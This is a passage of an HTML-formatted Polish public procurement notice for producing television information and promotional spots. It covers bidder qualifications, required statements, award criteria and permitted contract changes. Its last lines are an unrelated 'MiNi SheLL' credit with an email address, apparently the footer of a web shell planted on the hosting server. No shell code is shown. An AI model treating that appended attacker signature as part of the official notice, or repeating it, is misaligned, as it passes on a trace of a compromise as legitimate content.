                Wykonawca spełni warunek jeżeli wykaże, że w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy  w tym okresie, wykonali / wykonują, co najmniej 2 usługi o charakterze i złożoności porównywalnej z przedmiotem zamówienia, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty których mowa, wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie wykonawcy. W przypadku świadczeń okresowych lub ciągłych nadal wykonywanych referencje bądź inne dokumenty potwierdzające ich należyte wykonywanie powinny być wydane nie wcześniej niż 3 miesiące przed upływem terminu składania ofert. Poprzez usługi o charakterze i złożoności porównywalnej z przedmiotem zamówienia należy rozumieć wykonywanie usług produkcji spotów telewizyjnych, informacyjnych oraz promocyjnych.<br />
                Zamawiający wymaga od wykonawców wskazania w ofercie lub we wniosku o dopuszczenie do udziału w postępowaniu imion i nazwisk osób wykonujących czynności przy realizacji zamówienia wraz z informacją o kwalifikacjach zawodowych lub doświadczeniu tych osób:
                
                  nie
                <br />
                Informacje dodatkowe:
                </div><b>
                III.2) PODSTAWY WYKLUCZENIA
              </b><br /><div style="padding-left: 20px"><b>III.2.1) Podstawy wykluczenia określone w art. 24 ust. 1  ustawy Pzp</b><br /><b>III.2.2) Zamawiający przewiduje wykluczenie wykonawcy na podstawie art. 24 ust. 5 ustawy Pzp</b>
                  tak
                  <br />
                  Zamawiający przewiduje następujące fakultatywne podstawy wykluczenia:
                <br />
                  (podstawa wykluczenia określona w art. 24 ust. 5 pkt 1 ustawy Pzp)
                <br /></div><b>
                III.3) WYKAZ OŚWIADCZEŃ SKŁADANYCH PRZEZ WYKONAWCĘ W CELU WSTĘPNEGO POTWIERDZENIA, ŻE NIE PODLEGA ON WYKLUCZENIU ORAZ SPEŁNIA WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ SPEŁNIA KRYTERIA SELEKCJI
              </b><br /><div style="padding-left: 20px"><b>
                  Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu
                </b><br />
                  tak
                <br /><b>
                  Oświadczenie o spełnianiu kryteriów selekcji
                </b><br />
                  nie
                </div><b>
                III.4) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW , SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 3 USTAWY PZP:
              </b><br /><div style="padding-left: 20px">1. Odpisu  z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeśli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 5 pkt 1 ustawy Pzp. 2. Oświadczenie wykonawcy o przynależności albo braku przynależności do tej samej grupy kapitałowej.</div><b>
                III.5) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 1 USTAWY PZP
              </b><br /><div style="padding-left: 20px"><b>III.5.1) W ZAKRESIE SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU:</b><br />Wykaz wykonanych usług, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych,w okresie ostatnich 3 lat przed upływem terminu składania ofert, a jeśli okres prowadzenia działalności jest krótszy  w tym okresie,wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których usługi zostały wykonane oraz załączeniem dowodów określających czy te usługi zostały wykonane lub są wykonywane należycie, przy czym dowodami, o których mowa, są referencje bądź inne dokumenty których mowa, wystawione przez podmiot, na rzecz którego usługi były wykonywane, a w przypadku świadczeń okresowych lub ciągłych są wykonywane, a jeżeli z uzasadnionej przyczyny o obiektywnym charakterze wykonawca nie jest w stanie uzyskać tych dokumentów  oświadczenie wykonawcy.<br /><b>III.5.2) W ZAKRESIE KRYTERIÓW SELEKCJI:</b><br /></div><b>
                III.6) WYKAZ OŚWIADCZEŃ LUB DOKUMENTÓW SKŁADANYCH PRZEZ WYKONAWCĘ W POSTĘPOWANIU NA WEZWANIE ZAMAWIAJACEGO W CELU POTWIERDZENIA OKOLICZNOŚCI, O KTÓRYCH MOWA W ART. 25 UST. 1 PKT 2 USTAWY PZP
              </b><br /><div style="padding-left: 20px"></div><b>
                III.7) INNE DOKUMENTY NIE WYMIENIONE W pkt III.3) - III.6)
              </b><div style="padding-left: 20px">1. Wypełniony formularz oferty 2. Dokument, z którego wynika upoważnienie do reprezentowania Wykonawcy, a w przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia  pełnomocnictwo rodzajowe (w oryginale lub kopii potwierdzonej notarialnie) do reprezentowania ich w niniejszym postępowaniu albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego, o ile ofertę składa Pełnomocnik.</div></div></div><div class="headerLarge_xforms" style="text-align: left"><u>
              SEKCJA IV: PROCEDURA
            </u></div><div style="padding-left: 20px;"><div style="text-align: left"><b>IV.1) OPIS </b><br /><b>IV.1.1) Tryb udzielenia zamówienia: </b>
                przetarg nieograniczony
              <br /><b>IV.1.2) Zamawiający żąda wniesienia wadium:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>IV.1.3) Przewiduje się udzielenie zaliczek na poczet wykonania zamówienia:</b><div style="padding-left: 20px">
                  nie
                </div><br /><b>
                IV.1.4) Wymaga się złożenia ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie ofert w postaci katalogów elektronicznych lub dołączenia do ofert katalogów elektronicznych:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /></div><br /><b>
                IV.1.5.) Wymaga się złożenia oferty wariantowej:
              </b><div style="padding-left: 20px">
                  nie
                <br />
                Dopuszcza się złożenie oferty wariantowej
                <br />
                  nie
                <br />
                Złożenie oferty wariantowej dopuszcza się tylko z jednoczesnym złożeniem oferty zasadniczej:
                <br />
                  nie
                </div><br /><b>
                IV.1.6) Przewidywana liczba wykonawców, którzy zostaną zaproszeni do udziału w postępowaniu
              </b><br /><i>
                (przetarg ograniczony, negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne)
              </i><div style="padding-left: 20px">
                Liczba wykonawców  <br />
                Przewidywana minimalna liczba wykonawców  <br />
                Maksymalna liczba wykonawców  <br />
                Kryteria selekcji wykonawców:
                <br /></div><br /><b>
                IV.1.7) Informacje na temat umowy ramowej lub dynamicznego systemu zakupów:
              </b><div style="padding-left: 20px">
                Umowa ramowa będzie zawarta:
                <br /><br />
                Czy przewiduje się ograniczenie liczby uczestników umowy ramowej:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                Zamówienie obejmuje ustanowienie dynamicznego systemu zakupów:
                <br />
                  nie
                <br />
                Informacje dodatkowe:
                <br /><br />
                W ramach umowy ramowej/dynamicznego systemu zakupów dopuszcza się złożenie ofert w formie katalogów elektronicznych:
                <br />
                  nie
                <br />
                Przewiduje się pobranie ze złożonych katalogów elektronicznych informacji potrzebnych do sporządzenia ofert w ramach umowy ramowej/dynamicznego systemu zakupów:
                <br />
                  nie
                </div><br /><b>IV.1.8) Aukcja elektroniczna </b><br /><b>
                Przewidziane jest przeprowadzenie aukcji elektronicznej </b><i>(przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem) </i>
                nie
              <br /><b>Należy wskazać elementy, których wartości będą przedmiotem aukcji elektronicznej: </b><br /><b>Przewiduje się ograniczenia co do przedstawionych wartości, wynikające z opisu przedmiotu zamówienia:</b><br />
                nie
              <br />

              
                Należy podać, które informacje zostaną udostępnione wykonawcom w trakcie aukcji elektronicznej oraz jaki będzie  termin ich udostępnienia:
              
              <br />
              Informacje dotyczące przebiegu aukcji elektronicznej: 
              <br />
              Jaki jest przewidziany sposób postępowania w toku aukcji elektronicznej i jakie będą warunki, na jakich wykonawcy będą mogli licytować (minimalne wysokości postąpień): 
              <br />
              Informacje dotyczące wykorzystywanego sprzętu elektronicznego, rozwiązań i specyfikacji technicznych w zakresie połączeń:
              <br />
              Wymagania dotyczące rejestracji i identyfikacji wykonawców w aukcji elektronicznej: 
              <br />


              Informacje o liczbie etapów aukcji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Aukcja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Czy wykonawcy, którzy nie złożyli nowych postąpień, zostaną zakwalifikowani do następnego etapu:
                
                  nie
                <br />
                Warunki zamknięcia aukcji elektronicznej:
                <br /></div><br /><b>IV.2) KRYTERIA OCENY OFERT </b><br /><b>IV.2.1) Kryteria oceny ofert: </b><br /><b>IV.2.2) Kryteria</b><br /><div style="padding-left: 20px"><table><tr><td><i>Kryteria</i></td><td><i>Znaczenie</i></td></tr><tr><td>Cena</td><td>60</td></tr><tr><td>Czas reakcji</td><td>40</td></tr></table></div><br /><b>IV.2.3) Zastosowanie procedury, o której mowa w art. 24aa ust. 1 ustawy Pzp </b>(przetarg nieograniczony)
              <br />
                tak
              <br /><b>IV.3) Negocjacje z ogłoszeniem, dialog konkurencyjny, partnerstwo innowacyjne </b><br /><b>IV.3.1) Informacje na temat negocjacji z ogłoszeniem</b><br />
              Minimalne wymagania, które muszą spełniać wszystkie oferty:
              <br /><br />
              Przewidziane jest zastrzeżenie prawa do udzielenia zamówienia na podstawie ofert wstępnych bez przeprowadzenia negocjacji
              
                nie
              <br />
              Przewidziany jest podział negocjacji na etapy w celu ograniczenia liczby ofert:
              
                nie
              <br />
              Należy podać informacje na temat etapów negocjacji (w tym liczbę etapów):
              <br /><br />
              Informacje dodatkowe
              <br /><br /><br /><b>IV.3.2) Informacje na temat dialogu konkurencyjnego</b><br />
              Opis potrzeb i wymagań zamawiającego lub informacja o sposobie uzyskania tego opisu:
              <br /><br />
              Informacja o wysokości nagród dla wykonawców, którzy podczas dialogu konkurencyjnego przedstawili rozwiązania stanowiące podstawę do składania ofert, jeżeli zamawiający przewiduje nagrody:
              <br /><br />
              Wstępny harmonogram postępowania:
              <br /><br />
              Podział dialogu na etapy w celu ograniczenia liczby rozwiązań:
              
                nie
              <br />
              Należy podać informacje na temat etapów dialogu:
              <br /><br /><br />
              Informacje dodatkowe:
              <br /><br /><b>IV.3.3) Informacje na temat partnerstwa innowacyjnego</b><br />
              Elementy opisu przedmiotu zamówienia definiujące minimalne wymagania, którym muszą odpowiadać wszystkie oferty:
              <br /><br />
              Podział negocjacji na etapy w celu ograniczeniu liczby ofert podlegających negocjacjom poprzez zastosowanie kryteriów oceny ofert wskazanych w specyfikacji istotnych warunków zamówienia:
              <br />
                nie
              <br />
              Informacje dodatkowe:
              <br /><br /><b>IV.4) Licytacja elektroniczna  </b><br />
              Adres strony internetowej, na której będzie prowadzona licytacja elektroniczna:
              <br /><div style="padding-left: 20px"></div>

              Adres strony internetowej, na której jest dostępny opis przedmiotu zamówienia w licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Wymagania dotyczące rejestracji i identyfikacji wykonawców w licytacji elektronicznej, w tym wymagania techniczne urządzeń informatycznych:
              <br /><div style="padding-left: 20px"></div>

              Sposób postępowania w toku licytacji elektronicznej, w tym określenie minimalnych wysokości postąpień:
              <br /><div style="padding-left: 20px"></div>

              Informacje o liczbie etapów licytacji elektronicznej i czasie ich trwania: 
              <div style="padding-left: 20px">
                  Licytacja wieloetapowa
                  <table><tr><td>etap nr</td><td>czas trwania etapu</td></tr><tr><td></td><td></td></tr></table><br />
                Wykonawcy, którzy nie złożyli nowych postąpień, zostaną  zakwalifikowani do następnego etapu:
                
                  nie
                </div>

              Termin otwarcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div>

              Termin i warunki zamknięcia licytacji elektronicznej:
              <br /><div style="padding-left: 20px"></div><br />
              Istotne dla stron postanowienia, które zostaną wprowadzone do treści zawieranej umowy w sprawie zamówienia publicznego, albo ogólne warunki umowy, albo wzór umowy:
              <br /><div style="padding-left: 20px"></div><br />
              Wymagania dotyczące zabezpieczenia należytego wykonania umowy: 
              <br /><div style="padding-left: 20px"></div><br />
              Informacje dodatkowe:
              <br /><div style="padding-left: 20px"></div><b>IV.5) ZMIANA UMOWY</b><br /><b>Przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy:</b>
                tak

                <br />
                Należy wskazać zakres, charakter zmian oraz warunki wprowadzenia zmian:
                <br />Zamawiający dopuszcza ewentualną zmianę następujących postanowień umownych:
a) zmiana wynagrodzenia Wykonawcy w przypadku zmiany przez ustawodawcę przepisów dotyczących stawki procentowej należnego podatku VAT,
b) osób będących przedstawicielami Zamawiającego z przyczyn niezależnych od niego, 
c) zamawiający dopuszcza ewentualną zmianę postanowień umownych gdy zaistnieje niemożliwa do przewidzenia w momencie zawarcia umowy okoliczność prawna, ekonomiczna lub techniczna, za którą żadna ze stron nie ponosi odpowiedzialności, skutkująca brakiem możliwości należytego wykonania umowy, zgodnie z niniejszą Specyfikacją,
d) osób spełniających warunki udziału w przedmiotowym postępowaniu wymienionych w ofercie, pod warunkiem wyrażenia zgody przez Zamawiającego oraz że zaproponowane osoby będą spełniały warunki udziału opisane w SIWZ,
e) dopuszcza zmianę umowy w formie aneksu, jeżeli zajdzie potrzeba w sytuacji zmiany obowiązujących przepisów, jeżeli zgodnie z nimi konieczne będzie dostosowanie treści umowy do aktualnego stanu prawnego. Zmiana wymaga zgłoszenia w formie pisemnej w ciągu 14 dni od powzięcia informacji stanowiącej podstawę do wprowadzenia zmian. Zmiana ta może spowodować wydłużenie terminu wykonania prac i nie spowoduje zmiany wynagrodzenia wykonawcy. Inicjatorem tej zmiany może być zamawiający lub wykonawca,
f) umowa może być zmieniona w przypadku, kiedy w umowie znajdują się oczywiste błędy pisarskie lub rachunkowe, a także zapisy, których wykonanie jest niemożliwe ze względu na obowiązujące przepisy prawa  w zakresie, który jest niezbędny do wyeliminowania tych błędów,
g) zmiany postanowień umowy mogących mieć wpływ na niezakończenie lub utrata finansowania zadania,
<br /><b>IV.6) INFORMACJE ADMINISTRACYJNE </b><br /><br /><b>IV.6.1) Sposób udostępniania informacji o charakterze poufnym </b><i>(jeżeli dotyczy): </i><br /><br /><b>Środki służące ochronie informacji o charakterze poufnym</b><br /><br /><b>IV.6.2) Termin składania ofert lub wniosków o dopuszczenie do udziału w postępowaniu: </b><br />
              Data: 09/12/2016, godzina: 10:00,
              <br />
              Skrócenie terminu składania wniosków, ze względu na pilną potrzebę udzielenia zamówienia (przetarg nieograniczony, przetarg ograniczony, negocjacje z ogłoszeniem):
              <br />
                nie
              <br />
              Wskazać powody:
              <br /><br />
              Język lub języki, w jakich mogą być sporządzane oferty lub wnioski o dopuszczenie do udziału w postępowaniu
              <br />&gt;
              Polski<br /><b>IV.6.3) Termin związania ofertą: </b>
                okres w dniach: 30 (od ostatecznego terminu składania ofert)
              <br /><b>IV.6.4) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia:</b>
                nie
              <br /><b>IV.6.5) Przewiduje się unieważnienie postępowania o udzielenie zamówienia, jeżeli środki służące sfinansowaniu zamówień na badania naukowe lub prace rozwojowe, które zamawiający zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia, nie zostały mu przyznane</b>
                nie
              <br /><b>IV.6.6) Informacje dodatkowe:</b><br /></div></div></div>

Creat By MiNi SheLL
Email: jattceo@gmail.com